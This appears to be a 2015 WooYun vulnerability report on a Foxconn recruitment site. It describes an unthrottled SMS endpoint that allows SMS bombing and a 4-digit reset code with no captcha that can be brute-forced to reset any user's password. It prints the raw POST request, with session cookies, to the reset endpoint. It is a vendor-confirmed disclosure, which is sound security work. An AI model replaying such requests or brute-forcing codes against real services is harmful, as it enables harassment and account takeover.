当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147334

漏洞标题:富士康网站短信轰炸+任意用户密码重置漏洞

相关厂商:富士康科技集团

漏洞作者: 马崧耀

提交时间:2015-10-17 08:51

修复时间:2015-12-03 10:00

公开时间:2015-12-03 10:00

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-17: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

RT

详细说明:

漏洞证明:

一、短信接口无限制,可以随意提交(即使提交1W次,也会执行发送),导致可照成短信轰炸,无限刷验证码。

IMG_1516.PNG


QQ截图20151017033332.png


POST /Service/ResetPassword.ashx?action=getkey&etc=1445026010064 HTTP/1.0
Host: zp.foxconn.com
Proxy-Connection: keep-alive
Content-Length: 18
Accept: */*
Origin: http://zp.foxconn.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://zp.foxconn.com/Pages/ForgetPwd.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.6
Cookie: pgv_pvi=2624244736; _ga=GA1.2.592459715.1444593128; ASP.NET_SessionId=11yvonihyh1rgac4w3fzebkk; CNZZDATA1255715083=1812252206-1444409413-null%7C1445022513; Hm_lvt_d4255227dec4a118fe39b3892590a467=1444411330,1444589558,1445022505; Hm_lpvt_d4255227dec4a118fe39b3892590a467=1445026005
mobile=XXXXXXXXXXX


二、短信验证码采用4位随机数字,并且无验证码。直接从1-9999进行提交,暴力破解短信验证码,可实现使用任意手机号注册,重置任意用户密码。

QQ截图20151017033227.png


QQ截图20151017040420.png


(为了展示漏洞真实性..特地用13800138000号码注册了一个,相信没人能从这个号码上收短信吧。。。)

修复方案:

你们更懂- -...

版权声明:转载请注明来源 马崧耀@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-19 09:59

厂商回复:

感谢提交相关漏洞,已交由相关单位处理

最新状态:

暂无


漏洞评价:

评价